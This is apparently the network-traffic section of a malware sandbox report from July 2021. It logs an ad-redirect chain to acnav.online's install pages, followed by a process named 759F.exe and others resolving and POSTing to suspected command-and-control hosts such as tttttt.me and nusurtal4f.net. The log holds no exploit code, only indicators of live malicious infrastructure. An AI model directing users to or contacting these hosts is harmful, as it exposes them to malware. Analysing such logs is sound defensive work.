                                                                                          GET /script/i.php?stamat=m%7C%2C%2Cg2Z_dhfjoGU3Bv-GH0dEdHP3xP.8ed%2CbvxNWSCgUX2wN0iJxBQyUR7vIyZ_vZhfkY7yYmMCVOCl_0vxaxm8G84oahCjKPLQCkXc_RzIT98c-OfvbZ6CEvtY8_4f1SZFLwJGsIuMwyOkMgUBwjuR7MbXQtJgx27mFJanPjuotJ19tvCCO2T-fvCavAni-lXbIpS3gk42R852nkWikVKrH-h9SNWVKt8VPUU6B-52qkMPRG3mI8S0EDVC5yCkaXL89E_HPhCDJMoHeXFCRG7ZJIYWX8AvRLpZXIkEe9ze7KIMXMftIlCVERO4ASt8bmsq0JdJ8pwzfrkDJa_XVqR6AcZKEpDwCPhyNGcDbIp2pC82RSvZN-kxdbAP1vb67GoUUoPrEFNAKY7azuuNDT66MjS4SS0kvWHlX36sIVjn1NDGEcFYuKnIXtknQAoXF-X7WdOvJ9K_K5dZWQlmmzWbMmV8caHkSv-6btiR4nkPQEI2D5p7hKq2OqBxjvYio8Ndn4i00OlGhMth2c64fdXQBM7X10HsBBu6 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.directdexchange.com
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Moved Temporarily
                                                                                          Server: openresty
                                                                                          Date: Fri, 09 Jul 2021 23:20:59 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Access-Control-Allow-Origin: *
                                                                                          Location: https://dist.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Referrer-Policy: no-referrer
                                                                                          Via: 1.1 google
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          dist.acnav.online
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          dist.acnav.online
                                                                                          IN A
                                                                                          Response
                                                                                          dist.acnav.online
                                                                                          IN CNAME
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          hidden-roadrunner-k7np31v1e60rzrp6qya5k4lv.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://dist.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /?c=ac&subid=16258728592587707149156352085882481&cid=2087215 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: dist.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Location: https://www.acnav.online?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Vary: Accept
                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                          Content-Length: 105
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.acnav.online
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.acnav.online
                                                                                          IN A
                                                                                          Response
                                                                                          www.acnav.online
                                                                                          IN CNAME
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /?c=ac&subid=16258728592587707149156352085882481&cid=2087215 HTTP/1.1
                                                                                          Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          Referer: http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 31283
                                                                                          Etag: "-70761292"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/js/global.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /js/global.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "2171-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/javascript
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/images/install-step1-chrome.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /images/install-step1-chrome.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "23056-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 23056
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/config.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /config.min.js HTTP/1.1
                                                                                          Accept: application/javascript, */*;q=0.8
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "1060-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/javascript
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/layouts/box/box.css
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /layouts/box/box.css HTTP/1.1
                                                                                          Accept: text/css, */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "10747-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: text/css; charset=UTF-8
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/images/install-step2.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /images/install-step2.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "20738-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 20738
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/resources/Wiki/links.json
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /resources/Wiki/links.json HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "389-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 389
                                                                                          Vary: Accept-Encoding
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/images/install-step3.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /images/install-step3.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "14921-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:00 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 14921
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/lang/box/ePedia
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /lang/box/ePedia HTTP/1.1
                                                                                          Accept: */*
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: application/json
                                                                                          Content-Length: 4486
                                                                                          Etag: "1455465032"
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/resources/Wiki/logo.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /resources/Wiki/logo.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "9614-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 9614
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/resources/Wiki/background.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /resources/Wiki/background.png HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.acnav.online/?c=ac&subid=16258728592587707149156352085882481&cid=2087215
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: www.acnav.online
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: _ga=GA1.2.1293510956.1625879843; _gid=GA1.2.34305125.1625879843; _gat=1; vid=11657feb-04cd-907d-bfee-9bc2af73e405
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "65781-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/png
                                                                                          Content-Length: 65781
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          ajax.googleapis.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          ajax.googleapis.com
                                                                                          IN A
                                                                                          Response
                                                                                          ajax.googleapis.com
                                                                                          IN A
                                                                                          142.250.179.202
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.acnav.online
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.acnav.online
                                                                                          IN A
                                                                                          Response
                                                                                          www.acnav.online
                                                                                          IN CNAME
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          54.91.59.199
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.220.57.224
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          52.20.78.240
                                                                                          animate-whippet-qotfzhmasm9zl23tfv4hg9k1.herokudns.com
                                                                                          IN A
                                                                                          3.232.242.170
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: www.acnav.online
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Content-Type: text/html
                                                                                          Vary: Accept-Encoding
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.acnav.online/resources/Wiki/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          54.91.59.199:443
                                                                                          Request
                                                                                          GET /resources/Wiki/favicon.ico HTTP/1.1
                                                                                          Accept: */*
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Host: www.acnav.online
                                                                                          DNT: 1
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: Cowboy
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: Express
                                                                                          Accept-Ranges: bytes
                                                                                          Etag: "370070-1625474775000"
                                                                                          Date: Fri, 09 Jul 2021 23:21:01 GMT
                                                                                          Cache-Control: public, max-age=0
                                                                                          Last-Modified: Mon, 05 Jul 2021 08:46:15 GMT
                                                                                          Content-Type: image/x-icon
                                                                                          Vary: Accept-Encoding
                                                                                          Content-Encoding: gzip
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 vegur
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          cdnjs.cloudflare.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          Response
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.18.94
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.19.94
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 109
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:22:01 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 7
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          i.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.52
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          www.instagram.com
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • DNS
                                                                                          nusurtal4f.net
                                                                                          Request
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          Response
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          5.61.43.76
                                                                                        • POST
                                                                                          http://nusurtal4f.net/
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 337
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:23:53 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 7
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • DNS
                                                                                          i.instagram.com
                                                                                          Request
                                                                                          i.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          i.instagram.com
                                                                                          IN CNAME
                                                                                          instagram.c10r.facebook.com
                                                                                          instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.52
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • DNS
                                                                                          tttttt.me
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
